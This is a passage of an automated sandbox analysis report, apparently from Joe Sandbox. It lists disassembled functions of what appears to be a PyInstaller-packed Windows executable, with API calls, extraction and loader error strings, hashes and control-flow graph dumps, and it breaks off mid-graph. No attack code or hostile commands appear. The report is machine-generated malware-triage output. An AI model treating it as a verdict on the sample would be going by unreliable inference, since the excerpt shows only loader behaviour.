                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                                  • String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3752271684-1116378104
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1d9e258da007ff631f6f4def1fb3654599ed4050775efbb50ecb9fbb99f68cf7
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: be9c22e6aa7af0a31c578196fb9c4caece78f578bd352948f4b7fe7944f0d7ef
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1d9e258da007ff631f6f4def1fb3654599ed4050775efbb50ecb9fbb99f68cf7
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E517253B0D20352FF18A76298193BA71565F4BBC0F447031DD0ECB796ED6EE523A24A
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 772 7ff6e1b550cc-7ff6e1b55101 call 7ff6e1b547d8 call 7ff6e1b547e0 call 7ff6e1b54848 779 7ff6e1b55107-7ff6e1b55112 call 7ff6e1b547e8 772->779 780 7ff6e1b5523f-7ff6e1b552ad call 7ff6e1b49e00 call 7ff6e1b506e8 772->780 779->780 785 7ff6e1b55118-7ff6e1b55123 call 7ff6e1b54818 779->785 792 7ff6e1b552bb-7ff6e1b552be 780->792 793 7ff6e1b552af-7ff6e1b552b6 780->793 785->780 791 7ff6e1b55129-7ff6e1b5514c call 7ff6e1b49e48 GetTimeZoneInformation 785->791 804 7ff6e1b55152-7ff6e1b55173 791->804 805 7ff6e1b55214-7ff6e1b5523e call 7ff6e1b547d0 call 7ff6e1b547c0 call 7ff6e1b547c8 791->805 796 7ff6e1b552f5-7ff6e1b55308 call 7ff6e1b4cafc 792->796 797 7ff6e1b552c0 792->797 795 7ff6e1b5534b-7ff6e1b5534e 793->795 798 7ff6e1b552c3 call 7ff6e1b550cc 795->798 799 7ff6e1b55354-7ff6e1b5535c call 7ff6e1b54e50 795->799 808 7ff6e1b5530a 796->808 809 7ff6e1b55313-7ff6e1b5532e call 7ff6e1b506e8 796->809 797->798 812 7ff6e1b552c8-7ff6e1b552f4 call 7ff6e1b49e48 call 7ff6e1b3adb0 798->812 799->812 810 7ff6e1b55175-7ff6e1b5517b 804->810 811 7ff6e1b5517e-7ff6e1b55185 804->811 815 7ff6e1b5530c-7ff6e1b55311 call 7ff6e1b49e48 808->815 830 7ff6e1b55335-7ff6e1b55347 call 7ff6e1b49e48 809->830 831 7ff6e1b55330-7ff6e1b55333 809->831 810->811 817 7ff6e1b55187-7ff6e1b5518f 811->817 818 7ff6e1b55199 811->818 815->797 817->818 824 7ff6e1b55191-7ff6e1b55197 817->824 820 7ff6e1b5519b-7ff6e1b5520f call 7ff6e1b3c240 * 4 call 7ff6e1b51cac call 7ff6e1b55364 * 2 818->820 820->805 824->820 830->795 831->815
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF6E1B550FA
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF6E1B54848: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6E1B5485C
                                                                                                                                                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF6E1B5510B
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF6E1B547E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6E1B547FC
                                                                                                                                                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF6E1B5511C
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF6E1B54818: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6E1B5482C
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF6E1B49E48: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF6E1B51E72,?,?,?,00007FF6E1B51EAF,?,?,00000000,00007FF6E1B52375,?,?,?,00007FF6E1B522A7), ref: 00007FF6E1B49E5E
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF6E1B49E48: GetLastError.KERNEL32(?,?,?,00007FF6E1B51E72,?,?,?,00007FF6E1B51EAF,?,?,00000000,00007FF6E1B52375,?,?,?,00007FF6E1B522A7), ref: 00007FF6E1B49E68
                                                                                                                                                                                                                                                                                                                                  • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6E1B5535C), ref: 00007FF6E1B55143
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: _get_daylight_invalid_parameter_noinfo$ErrorInformationLanguagesLastPreferredRestoreThreadTimeZone
                                                                                                                                                                                                                                                                                                                                  • String ID: W. Europe Standard Time$W. Europe Summer Time
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2248164782-690618308
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 6a4653e18601d3b1e77d8173c576dc07d233a5b3d88cbe8539a6bd7f52c7a8a1
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2574765306bb41236789132b2105a0d00fdacd611ca53a696077200bbdf7c245
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6a4653e18601d3b1e77d8173c576dc07d233a5b3d88cbe8539a6bd7f52c7a8a1
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C951E573A1864286E320DF31E9803BA7761FF4A784F406236EA4DC7695DF3EE401A749
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: _fread_nolock$Message_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                                  • String ID: Cannot read Table of Contents.$Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2153230061-4158440160
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: aff7cfa151be38123c1a774c8cf161165edbf067f81432576bc3248f182a272a
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 38f2ebc5536f6e0b2d370087fef07252e0a807497cf11c2f9744df9838ab64d6
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aff7cfa151be38123c1a774c8cf161165edbf067f81432576bc3248f182a272a
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 47518C73A09606C2EB14CF28D45837833A5EF4AB48B51A135DA0CC3399DFBEE452D74A
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 53 7ff6e1b31440-7ff6e1b31457 call 7ff6e1b36740 56 7ff6e1b31459-7ff6e1b31461 53->56 57 7ff6e1b31462-7ff6e1b31485 call 7ff6e1b36a60 53->57 60 7ff6e1b314a7-7ff6e1b314ad 57->60 61 7ff6e1b31487-7ff6e1b314a2 call 7ff6e1b324d0 57->61 63 7ff6e1b314e0-7ff6e1b314f4 call 7ff6e1b3f964 60->63 64 7ff6e1b314af-7ff6e1b314ba call 7ff6e1b33cd0 60->64 69 7ff6e1b31635-7ff6e1b31647 61->69 72 7ff6e1b31516-7ff6e1b3151a 63->72 73 7ff6e1b314f6-7ff6e1b31511 call 7ff6e1b324d0 63->73 70 7ff6e1b314bf-7ff6e1b314c5 64->70 70->63 71 7ff6e1b314c7-7ff6e1b314db call 7ff6e1b32770 70->71 82 7ff6e1b31617-7ff6e1b3161d 71->82 76 7ff6e1b3151c-7ff6e1b31528 call 7ff6e1b31050 72->76 77 7ff6e1b31534-7ff6e1b31554 call 7ff6e1b440e0 72->77 73->82 83 7ff6e1b3152d-7ff6e1b3152f 76->83 85 7ff6e1b31556-7ff6e1b31570 call 7ff6e1b324d0 77->85 86 7ff6e1b31575-7ff6e1b3157b 77->86 87 7ff6e1b3162b-7ff6e1b3162e call 7ff6e1b3f2dc 82->87 88 7ff6e1b3161f call 7ff6e1b3f2dc 82->88 83->82 99 7ff6e1b3160d-7ff6e1b31612 85->99 90 7ff6e1b31581-7ff6e1b31586 86->90 91 7ff6e1b31605-7ff6e1b31608 call 7ff6e1b440cc 86->91 98 7ff6e1b31633 87->98 97 7ff6e1b31624 88->97 96 7ff6e1b31590-7ff6e1b315b2 call 7ff6e1b3f62c 90->96 91->99 102 7ff6e1b315b4-7ff6e1b315cc call 7ff6e1b3fd6c 96->102 103 7ff6e1b315e5-7ff6e1b315ec 96->103 97->87 98->69 99->82 109 7ff6e1b315ce-7ff6e1b315d1 102->109 110 7ff6e1b315d5-7ff6e1b315e3 102->110 105 7ff6e1b315f3-7ff6e1b315fb call 7ff6e1b324d0 103->105 111 7ff6e1b31600 105->111 109->96 112 7ff6e1b315d3 109->112 110->105 111->91 112->111
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-666925554
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: dd401965c18135f28b71ffef52ef46e5e989dac41e1fc053b5318d3e4ff296b0
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: eb957327ab88f22a193a94f6a9db14ae70f9531d3cd7cb8baf54a5d3bf910998
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dd401965c18135f28b71ffef52ef46e5e989dac41e1fc053b5318d3e4ff296b0
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4551C023B0864282EB10DB61D4087B97365AF46BD4F446031EE1D877D1EFBEE166A30A
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,00007FF6E1B3687A,?,?,00000000,?,?,00007FF6E1B3676D), ref: 00007FF6E1B37910
                                                                                                                                                                                                                                                                                                                                  • OpenProcessToken.ADVAPI32(?,?,00000000,?,?,00007FF6E1B3676D), ref: 00007FF6E1B37921
                                                                                                                                                                                                                                                                                                                                  • GetTokenInformation.KERNELBASE(?,?,00000000,?,?,00007FF6E1B3676D), ref: 00007FF6E1B37943
                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00000000,?,?,00007FF6E1B3676D), ref: 00007FF6E1B3794D
                                                                                                                                                                                                                                                                                                                                  • GetTokenInformation.KERNELBASE(?,?,00000000,?,?,00007FF6E1B3676D), ref: 00007FF6E1B3798A
                                                                                                                                                                                                                                                                                                                                  • ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6E1B3799C
                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,00000000,?,?,00007FF6E1B3676D), ref: 00007FF6E1B379B4
                                                                                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?,?,00000000,?,?,00007FF6E1B3676D), ref: 00007FF6E1B379E6
                                                                                                                                                                                                                                                                                                                                  • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00007FF6E1B37A0D
                                                                                                                                                                                                                                                                                                                                  • CreateDirectoryW.KERNELBASE(?,?,00000000,?,?,00007FF6E1B3676D), ref: 00007FF6E1B37A1E
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Token$ConvertDescriptorInformationProcessSecurityString$CloseCreateCurrentDirectoryErrorFreeHandleLastLocalOpen
                                                                                                                                                                                                                                                                                                                                  • String ID: D:(A;;FA;;;%s)$S-1-3-4
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4998090-2855260032
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 03e154d72cef7596c19cf90f58cf8d02b1ad3eb61a0626a7ad8befbf5a95a7ea
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 835f773415c9ce7e9bf69c80ed66a7184deeff63335bd17dc595db688d6f5a4e
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 03e154d72cef7596c19cf90f58cf8d02b1ad3eb61a0626a7ad8befbf5a95a7ea
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0641A03361C68283EB509F20E4487AA7362FB8A790F542231EA9E876D4DF7DD419D705
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                                                                                                                                                                                                                                                                  • String ID: CreateProcessW$Error creating child process!
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2895956056-3524285272
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 70482ae767ba9e09b517fd1531fb7070f55263243fe81ec667caeea18f8722ee
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a24fa8bc4e13d8348942b8a644c4a83d206d45408b00056218468d2598beca02
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 70482ae767ba9e09b517fd1531fb7070f55263243fe81ec667caeea18f8722ee
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C418133A08B8282DB209B20F4453AAB3A5FF96360F405335E6AD837D5DF7DD0559B05
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 383 7ff6e1b31000-7ff6e1b336a6 call 7ff6e1b3f0b0 call 7ff6e1b3f0a8 call 7ff6e1b37630 call 7ff6e1b3f0a8 call 7ff6e1b3ade0 call 7ff6e1b442a0 call 7ff6e1b44f44 call 7ff6e1b31af0 401 7ff6e1b336ac-7ff6e1b336bb call 7ff6e1b33bc0 383->401 402 7ff6e1b337ba 383->402 401->402 407 7ff6e1b336c1-7ff6e1b336d4 call 7ff6e1b33a90 401->407 404 7ff6e1b337bf-7ff6e1b337df call 7ff6e1b3adb0 402->404 407->402 411 7ff6e1b336da-7ff6e1b336ed call 7ff6e1b33b40 407->411 411->402 414 7ff6e1b336f3-7ff6e1b3371a call 7ff6e1b369b0 411->414 417 7ff6e1b3375c-7ff6e1b33784 call 7ff6e1b36fc0 call 7ff6e1b319d0 414->417 418 7ff6e1b3371c-7ff6e1b3372b call 7ff6e1b369b0 414->418 428 7ff6e1b3386d-7ff6e1b3387e 417->428 429 7ff6e1b3378a-7ff6e1b337a0 call 7ff6e1b319d0 417->429 418->417 424 7ff6e1b3372d-7ff6e1b33733 418->424 426 7ff6e1b3373f-7ff6e1b33759 call 7ff6e1b440cc call 7ff6e1b36fc0 424->426 427 7ff6e1b33735-7ff6e1b3373d 424->427 426->417 427->426 433 7ff6e1b33880-7ff6e1b3388a call 7ff6e1b332a0 428->433 434 7ff6e1b33893-7ff6e1b338ab call 7ff6e1b37a60 428->434 440 7ff6e1b337e0-7ff6e1b337e3 429->440 441 7ff6e1b337a2-7ff6e1b337b5 call 7ff6e1b32770 429->441 444 7ff6e1b3388c 433->444 445 7ff6e1b338cb-7ff6e1b338d8 call 7ff6e1b35e60 433->445 446 7ff6e1b338ad-7ff6e1b338b9 call 7ff6e1b32770 434->446 447 7ff6e1b338be-7ff6e1b338c5 SetDllDirectoryW 434->447 440->428 449 7ff6e1b337e9-7ff6e1b33800 call 7ff6e1b33cd0 440->449 441->402 444->434 458 7ff6e1b33926-7ff6e1b3392b call 7ff6e1b35de0 445->458 459 7ff6e1b338da-7ff6e1b338ea call 7ff6e1b35b00 445->459 446->402 447->445 456 7ff6e1b33807-7ff6e1b33833 call 7ff6e1b37230 449->456 457 7ff6e1b33802-7ff6e1b33805 449->457 468 7ff6e1b3385d-7ff6e1b3386b 456->468 469 7ff6e1b33835-7ff6e1b3383d call 7ff6e1b3f2dc 456->469 460 7ff6e1b33842-7ff6e1b33858 call 7ff6e1b32770 457->460 466 7ff6e1b33930-7ff6e1b33933 458->466 459->458 473 7ff6e1b338ec-7ff6e1b338fb call 7ff6e1b35660 459->473 460->402 471 7ff6e1b33939-7ff6e1b33946 466->471 472 7ff6e1b339e6-7ff6e1b339f5 call 7ff6e1b33130 466->472 468->433 469->460 476 7ff6e1b33950-7ff6e1b3395a 471->476 472->402 487 7ff6e1b339fb-7ff6e1b33a32 call 7ff6e1b36f50 call 7ff6e1b369b0 call 7ff6e1b353f0 472->487 485 7ff6e1b3391c-7ff6e1b33921 call 7ff6e1b358b0 473->485 486 7ff6e1b338fd-7ff6e1b33909 call 7ff6e1b355e0 473->486 481 7ff6e1b3395c-7ff6e1b33961 476->481 482 7ff6e1b33963-7ff6e1b33965 476->482 481->476 481->482 483 7ff6e1b33967-7ff6e1b3398a call 7ff6e1b31b30 482->483 484 7ff6e1b339b1-7ff6e1b339e1 call 7ff6e1b33290 call 7ff6e1b330d0 call 7ff6e1b33280 call 7ff6e1b358b0 call 7ff6e1b35de0 482->484 483->402 497 7ff6e1b33990-7ff6e1b3399b 483->497 484->404 485->458 486->485 498 7ff6e1b3390b-7ff6e1b3391a call 7ff6e1b35cb0 486->498 487->402 510 7ff6e1b33a38-7ff6e1b33a4b call 7ff6e1b33290 call 7ff6e1b37000 487->510 501 7ff6e1b339a0-7ff6e1b339af 497->501 498->466 501->484 501->501 518 7ff6e1b33a50-7ff6e1b33a6d call 7ff6e1b358b0 call 7ff6e1b35de0 510->518 523 7ff6e1b33a77-7ff6e1b33a81 call 7ff6e1b31ab0 518->523 524 